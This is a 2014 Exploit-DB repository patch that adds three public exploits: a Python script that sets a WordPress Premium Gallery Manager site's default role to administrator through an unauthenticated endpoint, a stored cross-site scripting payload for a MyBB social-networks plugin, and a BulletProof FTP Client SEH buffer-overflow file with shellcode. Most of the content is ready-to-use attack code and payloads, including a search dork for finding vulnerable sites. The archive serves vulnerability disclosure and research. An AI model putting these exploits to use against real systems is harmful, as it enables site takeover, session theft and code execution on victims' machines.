From fe6788f41bc570fc63fa78e050429e05b32c7a67 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sun, 7 Sep 2014 04:43:33 +0000
Subject: [PATCH] Updated 09_07_2014

---
 files.csv                       |  3 +++
 platforms/php/webapps/34538.txt | 43 +++++++++++++++++++++++++++++++++
 platforms/php/webapps/34539.txt | 30 +++++++++++++++++++++++
 platforms/windows/dos/34540.py  | 37 ++++++++++++++++++++++++++++
 4 files changed, 113 insertions(+)
 create mode 100755 platforms/php/webapps/34538.txt
 create mode 100755 platforms/php/webapps/34539.txt
 create mode 100755 platforms/windows/dos/34540.py

diff --git a/files.csv b/files.csv
index d736fd0c6..def69fa5a 100755
--- a/files.csv
+++ b/files.csv
@@ -31104,3 +31104,6 @@ id,file,description,date,author,platform,type,port
 34534,platforms/php/webapps/34534.txt,"TCMS Multiple Input Validation Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
 34535,platforms/php/webapps/34535.txt,"Valarsoft WebMatic 3.0.5 Multiple HTML Injection Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
 34536,platforms/php/webapps/34536.txt,"CompuCMS Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
+34538,platforms/php/webapps/34538.txt,"Wordpress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulnerability",2014-09-05,Hannaichi,php,webapps,80
+34539,platforms/php/webapps/34539.txt,"MyBB User Social Networks Plugin 1.2 - Stored XSS",2014-09-05,"Fikri Fadzil",php,webapps,80
+34540,platforms/windows/dos/34540.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit",2014-09-05,"Robert Kugler",windows,dos,0
diff --git a/platforms/php/webapps/34538.txt b/platforms/php/webapps/34538.txt
new file mode 100755
index 000000000..260801d18
--- /dev/null
+++ b/platforms/php/webapps/34538.txt
@@ -0,0 +1,43 @@
+#Exploit Title : Wordpress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulnerability
+#Author : Hannaichi [@dntkun]
+#Date : February 5th, 2014
+#Type : php, html, htm, asp, etc.
+#Category : Web Applications
+#Vulnerability : Unauthenticated Configuration Access
+#Tested On : Windows 7 32-bit | Google Chrome 
+
+#Dork : inurl:/wp-content/plugins/premium_gallery_manager/ | USE YOUR BRAIN =))
+
+#Exploit : http://victim/[PATH]/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php
+
+#POC : 
+Save File As Python (.py) = 
+import httplib, urllib
+
+#target site
+site = "victim" #<--- no http:// or https://
+#path to ajax.php
+url = "/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php"
+
+def ChangeOption(site, url, option_name, option_value):
+    params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
+    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
+    conn = httplib.HTTPConnection(site)
+    conn.request("POST", url, params, headers)
+    response = conn.getresponse()
+    print response.status, response.reason
+    data = response.read()
+    print data
+    conn.close()
+     
+ChangeOption(site, url, "admin_email", "youremail@test.com")
+ChangeOption(site, url, "users_can_register", "1")
+ChangeOption(site, url, "default_role", "administrator")
+print "Now register a new user, they are an administrator by default!"
+
+
+#Place It Broo No Lazy For This :D !!
+
+--------------------------------------------------------------------------------------------------------------------
+
+Thanks to: #AnonSec Hackers - Borneo Security - Bekantan Crew - Indonesian Hacker - Muslim Hacker - You :*
\ No newline at end of file
diff --git a/platforms/php/webapps/34539.txt b/platforms/php/webapps/34539.txt
new file mode 100755
index 000000000..c8ec9d0cd
--- /dev/null
+++ b/platforms/php/webapps/34539.txt
@@ -0,0 +1,30 @@
+# Exploit Title: User Social Networks MyBB Plugin 1.2 - Cross Site Scripting
+# Google Dork: N/A
+# Date: 05.09.2014
+# Exploit Author: Fikri Fadzil - fikri.fadzil@impact-alliance.org
+# Vendor Homepage - N/A
+# Software Link: http://mods.mybb.com/view/user-social-networks
+# Version: 1.2
+# Tested on: PHP
+
+
+Description:
+This plugin allows you to add social networks, or related, in user
+profiles. The information will be shown in a user profile and visible for
+anyone who view the profile.
+
+Proof of Concept
+1. Login into your account.
+2. Go to "Edit Profile" page at "/usercp.php?action=profile"
+3. Update your Social Network ID with
+"><script>alert(document.cookie)</script><"
+4. The result can be seen in multiple places, including your profile page.
+
+* The script will be executed whenever anyone view your profile.
+** The result can also be seen in threads you involve IF the administrator
+configure this plugin to allow user's social sites information to be
+published in every post.
+
+Solution:
+Replace the content of "inc/plugins/usersocial.php" with this fix:
+http://pastebin.com/T1WgcwDB
diff --git a/platforms/windows/dos/34540.py b/platforms/windows/dos/34540.py
new file mode 100755
index 000000000..e6b023f27
--- /dev/null
+++ b/platforms/windows/dos/34540.py
@@ -0,0 +1,37 @@
+# !/usr/bin/python
+#-----------------------------------------------------------------------------#
+# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit  #
+# Date: Sep 05 2014							      							  #
+# Vulnerability Discovery: Gabor Seljan                                       #
+# Exploit Author: Robert Kugler                                               #
+# Software Link: http://www.bpftp.com/                                        #
+# Version: 2010.75.0.76                                                       #
+# Tested on: Windows XP                                                       #
+# CVE: CVE-2014-2973 							      						  #
+#                                                         		      		  #
+# Thanks to corelanc0d3r for his awesome tutorials and help! ;-)	          #
+# The "Enter URL" form is also vulnerable	      			                  #
+#-----------------------------------------------------------------------------#
+
+buffer = "This is a BulletProof FTP Client Session-File and should not be modified directly.\n"
+buffer+= "\x20" + "\x90" * 89
+buffer+= "\xeb\x06\x90\x90"
+buffer+= "\xA0\xB3\x3C\x77" # shell32.dll pop pop ret @773CB3A0
+buffer+= "\x90" * 119 # 160 characters space
+buffer+= ("\x33\xc0\x50\x68"
+         "\x2E\x65\x78\x65"
+         "\x68\x63\x61\x6C"
+         "\x63\x8B\xC4\x6A" # 36 bytes
+         "\x01\x50\xBB\x35" # ExitProcess is located at 0x77e598fd in kernel32.dll
+         "\xfd\xe4\x77\xFF"
+         "\xD3\x33\xc0\x50"
+	 "\xc7\xc0\x8f\x4a"
+	 "\xe5\x77\xff\xe0")
+
+buffer+= "\x90" * (1000 - len(buffer))
+
+# Just load the "BP Session" and click on "Connect".
+
+file = open("ftpsession.bps","w")
+file.write(buffer)
+file.close()
\ No newline at end of file